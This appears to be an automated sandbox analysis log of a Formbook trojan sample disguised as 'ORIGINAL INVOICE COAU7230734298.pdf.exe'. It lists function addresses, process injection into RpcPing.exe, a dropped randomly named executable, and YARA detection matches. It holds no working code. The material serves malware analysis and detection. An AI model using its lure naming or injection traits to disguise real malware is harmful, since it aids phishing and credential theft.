Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A62F28 3_2_01A62F28
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A40F30 3_2_01A40F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC2F30 3_2_01AC2F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A94F40 3_2_01A94F40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32E90 3_2_01A32E90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADCE93 3_2_01ADCE93
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADEEDB 3_2_01ADEEDB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADEE26 3_2_01ADEE26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20E59 3_2_01A20E59
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2B1B0 3_2_01A2B1B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AEB16B 3_2_01AEB16B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5516C 3_2_01A5516C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0F172 3_2_01A0F172
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD70E9 3_2_01AD70E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF0E0 3_2_01ADF0E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACF0CC 3_2_01ACF0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A270C0 3_2_01A270C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A6739A 3_2_01A6739A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD132D 3_2_01AD132D
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0D34C 3_2_01A0D34C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A252A0 3_2_01A252A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC12ED 3_2_01AC12ED
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3D2F0 3_2_01A3D2F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3B2C0 3_2_01A3B2C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABD5B0 3_2_01ABD5B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE95C3 3_2_01AE95C3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7571 3_2_01AD7571
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF43F 3_2_01ADF43F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A11460 3_2_01A11460
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF7B0 3_2_01ADF7B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD16CC 3_2_01AD16CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A65630 3_2_01A65630
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB5910 3_2_01AB5910
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A29950 3_2_01A29950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3B950 3_2_01A3B950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A238E0 3_2_01A238E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8D800 3_2_01A8D800
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3FB80 3_2_01A3FB80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A95BF0 3_2_01A95BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5DBF9 3_2_01A5DBF9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFB76 3_2_01ADFB76
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A65AA0 3_2_01A65AA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABDAAC 3_2_01ABDAAC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC1AA3 3_2_01AC1AA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACDAC6 3_2_01ACDAC6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A93A6C 3_2_01A93A6C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFA49 3_2_01ADFA49
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7A46 3_2_01AD7A46
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3FDC0 3_2_01A3FDC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7D73 3_2_01AD7D73
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A23D40 3_2_01A23D40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD1D5A 3_2_01AD1D5A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFCF2 3_2_01ADFCF2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A99C32 3_2_01A99C32
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFFB1 3_2_01ADFFB1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A21F92 3_2_01A21F92
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E3FD5 3_2_019E3FD5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E3FD2 3_2_019E3FD2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFF09 3_2_01ADFF09
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A29EB0 3_2_01A29EB0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6C01 7_2_036F6C01
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F8BDE 7_2_036F8BDE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF27E 7_2_036FF27E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF27B 7_2_036FF27B
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F89BE 7_2_036F89BE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F89B5 7_2_036F89B5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_0370109E 7_2_0370109E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_0371752E 7_2_0371752E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6DA4 7_2_036F6DA4
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6C5E 7_2_036F6C5E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE03E6 8_2_03AE03E6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2E3F0 8_2_03A2E3F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADA352 8_2_03ADA352
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AA02C0 8_2_03AA02C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC0274 8_2_03AC0274
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE01AA 8_2_03AE01AA
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD41A2 8_2_03AD41A2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD81CC 8_2_03AD81CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A10100 8_2_03A10100
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABA118 8_2_03ABA118
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AA8158 8_2_03AA8158
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AB2000 8_2_03AB2000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1C7C0 8_2_03A1C7C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20770 8_2_03A20770
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A44750 8_2_03A44750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3C6E0 8_2_03A3C6E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE0591 8_2_03AE0591
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20535 8_2_03A20535
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACE4F6 8_2_03ACE4F6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC4420 8_2_03AC4420
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD2446 8_2_03AD2446
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD6BD7 8_2_03AD6BD7
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADAB40 8_2_03ADAB40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1EA80 8_2_03A1EA80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A229A0 8_2_03A229A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AEA9A6 8_2_03AEA9A6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A36962 8_2_03A36962
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A068B8 8_2_03A068B8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A4E8F0 8_2_03A4E8F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A22840 8_2_03A22840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2A840 8_2_03A2A840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A9EFA0 8_2_03A9EFA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A12FC8 8_2_03A12FC8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A62F28 8_2_03A62F28
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A40F30 8_2_03A40F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC2F30 8_2_03AC2F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A94F40 8_2_03A94F40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A32E90 8_2_03A32E90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADCE93 8_2_03ADCE93
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADEEDB 8_2_03ADEEDB
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADEE26 8_2_03ADEE26
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20E59 8_2_03A20E59
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A38DBF 8_2_03A38DBF
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1ADE0 8_2_03A1ADE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2AD00 8_2_03A2AD00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABCD1F 8_2_03ABCD1F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC0CB5 8_2_03AC0CB5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A10CF2 8_2_03A10CF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20C00 8_2_03A20C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A6739A 8_2_03A6739A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD132D 8_2_03AD132D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A0D34C 8_2_03A0D34C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A252A0 8_2_03A252A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC12ED 8_2_03AC12ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3D2F0 8_2_03A3D2F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3B2C0 8_2_03A3B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2B1B0 8_2_03A2B1B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AEB16B 8_2_03AEB16B
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A5516C 8_2_03A5516C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A0F172 8_2_03A0F172
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD70E9 8_2_03AD70E9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF0E0 8_2_03ADF0E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACF0CC 8_2_03ACF0CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A270C0 8_2_03A270C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF7B0 8_2_03ADF7B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD16CC 8_2_03AD16CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A65630 8_2_03A65630
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABD5B0 8_2_03ABD5B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE95C3 8_2_03AE95C3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7571 8_2_03AD7571
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF43F 8_2_03ADF43F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A11460 8_2_03A11460
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3FB80 8_2_03A3FB80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A95BF0 8_2_03A95BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A5DBF9 8_2_03A5DBF9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFB76 8_2_03ADFB76
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A65AA0 8_2_03A65AA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABDAAC 8_2_03ABDAAC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC1AA3 8_2_03AC1AA3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACDAC6 8_2_03ACDAC6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A93A6C 8_2_03A93A6C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFA49 8_2_03ADFA49
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7A46 8_2_03AD7A46
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AB5910 8_2_03AB5910
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29950 8_2_03A29950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3B950 8_2_03A3B950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A238E0 8_2_03A238E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A8D800 8_2_03A8D800
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFFB1 8_2_03ADFFB1
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A21F92 8_2_03A21F92
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD5 8_2_039E3FD5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD2 8_2_039E3FD2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFF09 8_2_03ADFF09
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29EB0 8_2_03A29EB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3FDC0 8_2_03A3FDC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7D73 8_2_03AD7D73
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A23D40 8_2_03A23D40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD1D5A 8_2_03AD1D5A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFCF2 8_2_03ADFCF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A99C32 8_2_03A99C32
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032717C0 8_2_032717C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C747 8_2_0326C747
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C750 8_2_0326C750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326AB36 8_2_0326AB36
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C970 8_2_0326C970
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9ED 8_2_0326A9ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9F0 8_2_0326A9F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03274E30 8_2_03274E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0328B2C0 8_2_0328B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327300D 8_2_0327300D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03273010 8_2_03273010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3038E 8_2_03D3038E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E334 8_2_03D3E334
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E7EC 8_2_03D3E7EC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D4552D 8_2_03D4552D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D454BD 8_2_03D454BD
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E453 8_2_03D3E453
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CAE8 8_2_03D3CAE8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CA8A 8_2_03D3CA8A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3D858 8_2_03D3D858
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CF489 9_2_058CF489
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD9 9_2_058D0CD9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD6 9_2_058D0CD6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA419 9_2_058CA419
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA410 9_2_058CA410
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058E8F89 9_2_058E8F89
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C87FF 9_2_058C87FF
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B9 9_2_058C86B9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B6 9_2_058C86B6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA639 9_2_058CA639
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D2AF9 9_2_058D2AF9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A9F290 appears 103 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A55130 appears 58 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A67E54 appears 107 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A0B970 appears 262 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A0B970 appears 262 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A67E54 appears 107 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A55130 appears 58 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A9F290 appears 103 times
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
